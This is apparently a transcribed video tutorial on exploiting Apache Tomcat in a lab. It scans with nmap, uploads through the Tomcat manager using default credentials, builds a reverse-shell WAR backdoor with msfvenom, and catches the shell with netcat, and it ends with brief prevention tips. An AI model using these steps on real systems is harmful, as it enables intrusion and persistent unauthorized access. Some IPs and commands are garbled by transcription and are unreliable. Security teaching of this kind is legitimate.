Wondered how hackers manage to slip back into a system again and again without ever needing to hack it twice. Today I'll stepping into a secret of world of backdoors, the hidden gateway that attackers create after exploiting a system, allowing them to return whenever they want. The zero resistance. Look at the screen carefully. In this video I will show you how backdoors are made, how they work, and why the skilled attackers step one up after gaining initial access. We'll break down the core idea. Once a vulnerable is found and exploited, the real goal is persistence. Let a hackers log in later without repeating the exploitation, brute forcing, or phishing. No hassle, no noise, just direct access. You will learn also why backdoors are so powerful, why give hackers a silent way to back in, why they often bypass detection tools, and the act like a digital skill-on keys useful for long-term control, data theft, or launching further attacks. And yes, you are getting hands-on. In the example, I used msfvenom, the powerful payload generator for Metasploit, to craft a custom backdoors that I will implant into a target system. Remember, it gets more real in the next part. I'll walk through how I exploited known vulnerabilities in Apache Tomcat, a real-world CVE, to gain access and drop my msfvenom generated backdoors into a target. Once that target is in, the target is mine. Anytime I want, no password needed. So, if you are serious about understanding ethical hacking, penetration testing, or just want to see what modern exploitation looks like in the world, stay tuned, because what comes next is exactly how attackers operate in the real world.
Hello, this is Engineer MD Joshuddin with you all, and you are watching Learn Cybersecurity video. In today's video, I will exploit Apache Tomcat web exploitation and with use of backdoors. So, anyone who like to be cybersecurity analyst, ethical hacker, or penetration tester, this video is must for them, because these kind of techniques will emphasize the knowledge of ethical hacking, the knowledge of backdoors, how to create backdoors, why it is so important for any hacker, and how any hacker exploit with use of reverse shell and make a war file to exploit web exploitation. I have a video, Samba file sharing exploitation, in my channel, so if you are interested, can see the video. So let's dive in Apache Tomcat exploitation and how to create backdoor for exploitation and with use of war file. How to create a war file to create a backdoor.
So we came here in our terminal and we'll exploit the Tomcat backdoors web exploitation, and we'll describe you how can any hacker or any black hat hacker can get access from the web disk and exploit the server. So in the terminal I am checking my IP, that is my local IP. 192.168.91.133 is my local machine IP, that is my hacking machine IP, and I am exploiting all the ports from the remote side, that is my attacker side, or I want to attack the site. This IP 192.168.91.139 is my remote side IP, and I'm exploiting with nmap those ports that opened. Look at the screen. Here is a lot of ports are opened here, and showing the status and which port are using for this for which service is showing also. Here is 8180 my target port then that I want to target, and this is my IP 192.168.91.139 is my remote side IP. So I came here in my another terminal and checking the reachability of the remote side 192.168.91.139. This is the IP being reachable, and I am getting the remote side easily. So I'll go to the another terminal and stop this and clear the screen, and here I am going to start msfconsol, and msfconsol is starting. Here one thing I want to mention here is a lot of ports available, or a lot of ports using different type of services. So if I want to attack this port 8180, I want to clear that I want to know the port is open or not. Here is showing port is open and I can target this. Here is lots of service are running. 8180 is my target machine IP. So Metasploit is opening here. Metasploit repeat version 4, that is version 9, and 1610 payloads here, 49 encoder and 13 knobs of encoder here. All the specification is showing on Metasploitable tool. Here Metasploit are opened and I want to clear the screen for a better view. So I am searching the Tomcat payloads that saved here. There is a lot of payloads that payload Tomcat manager and Tomcat manager upload, Tomcat manager login. I want to select the number 5 exploit multi HTTP Tomcat manager upload. So I use this. I can copy it or I can use this with the number. So I will select this with the number, use 5, enter, and that is the payload that I have selected. I clear the screen and I am searching the options, which options are available here for exploiting these services. This is port, SSL, target URI, HTTP password, HTTP name, remote host, and remote port. So I will clear the screen and select set the remote site RHOST. This is my target machine and RHOST is my remote machine. So I am selected the port, selected the IP. Here is the remote machine IP. So 192.168.91.39 is my remote machine IP and I have selected this. And the remote port, R port, that is my target machine port, that is 8180 that I want to target. 8180. Set R port 8180. Port has been selected. So I want to set the HTTP password from the options. Here is the HTTP password and HTTP username. I have selected already port number and remote host IP. So I want to select remote HTTP and HTTP user and HTTP password. Set HTTP username default Tomcat. HTTP username default Tomcat. Username selected. Set HTTP password default same Tomcat. This is mentioned here. Here is spelling mistake can be make problem. So be careful to use this for the beginner or learner. Here I have selected the HTTP passwords Tomcat and I want to see the options again. Those are selected. Now I want to select, I have selected 8180. Now I want to set the target URI and payload. The rest of the things that I didn't use. So I want to set target URI, / manager that I want to target. Manager has been selected. So I want to set payloads here. That is most important. Set payload Java shell / Java underscore reverse underscore TCP. This is the payload that I want to select or I want to use. Hit enter and it has been selected. I am not selecting my local machine port or local machine IP here. By default it has been selected, and if I want to exploit, just type exploit and run. It is exploited. Look at the screen. Session connected. Remote machine is connected to my local machine. Here is remote machine connected to my local machine, and I exploit the machine with the payload. 192.168.91.139 has been connected to my local machine. Now I am typing the remote machine IP here, HTTP 192.168.91.139 clone 8180. This is my remote machine port. So if I select the manager here, /manager HTML, if I hit enter to this URL, the username and password is appear on the screen. I have used here HTTP username or password by default Tomcat, so I will use those username and password here, Tomcat, and the password will be the Tomcat. Here we have already logged in to the server, remote server. Here's the WAR file that any backdoorer or any hacker can exploit with the WAR file. So I want to upload the WAR file to the server. I have to make the WAR file from my local machine. So I will make the WAR file from local machine, and after that I will upload this to this URL and make execution. So next step will be make WAR file. I have selected a terminal and clear the screen. So I have given ls where I am. I need to go to my desktop, so I will type cd desktop. I am in the desktop here. So I want to create a WAR file with msfvenom. Just type msfvenom -p java shell _reverse TCP. That the payload we have selected. This is the payload, and the local host will be my IP. This is my hacking machine IP. So I want to clear the IP here. That is remote machine will connect to my local machine with this IP, and if I want to request to the remote machine will reversely connected to my local machine. So he need my IP. I am selected this IP and my port. This is my local port 4444. I have missed the is equal to port is equal to 4444. So all done. Here is a parameter f for force. To create WAR file, I have given the name shell.war file. That's it. That's how any attacker use msfvenom to create backdoors to connect remote servers. Remote server will connect reversely to the local machine with the WAR file. Now this is -f for force WAR file, and hit enter. After that the file will be created or generated to my desktop. Look at the screen. File being creating. Need some time. Now file been created and 13033 bytes has been created. So I will go to the URL again where the war file browse. I will click on browse and the file that I have created few moments earlier, I will select this shell.war file, open and click the deploy. Done. The file been uploaded to the remote site or remote server that my target machine. So now I want to execute the war file or execute the shell file with the URL. I'm going to this URL 192.168.191.139 clone 8180 shell that is the execution of the shell file. Shell file being executed. Look at the screen. Shell file being executed, and if I go to the another terminal to connect to send a request to the remote machine, that remote machine will reversely connected to my PC or connected to my hacking machine. It will automatically connected and will create a session to exploitation or to hacking data. Now I'm typing nc-lbpn, that is the port. This is the remote machine shell. Look at the screen carefully. Session been created. I'm logging into the remote server reversely or using reverse shell with the backdoors. This is how backdoors work. Now I am in the remote site or remote machine. This is all the directories of the remote machine. This is the session that I have created to or remote machine created to my local machine. This is the home. If I want to go to the home, cd home, enter. If I do ls, it will show pwd. Look at the screen. I am in the remote machine home directory. This is how any hackers make backdoors to communicate with any remote site, to use reverse shell and msfvenom to exploit data and many more. Backdoors are mainly used to reduce the time and make secure door that the hacker can log into the remote machine easily to control the system and tap the data from web disk. Making backdoors simplify the attackers' work and also make an easy way to communicate with the remote site or remote servers. Prevention. Next generation firewall can be implemented. Default password should be encrypted. Default connection should be encrypted. And open port are always dangerous. So port monitoring is very necessary and mandatory to scanning.
You have seen how Apache Tomcat exploit. This kind of CVE exploitation knowledge can gear up your skills, and as a beginner you gain lot of knowledge, lot of confidence to this kind of exploitation. So if you like this kind of video, please subscribe my channel and hit the bell icon. Take care.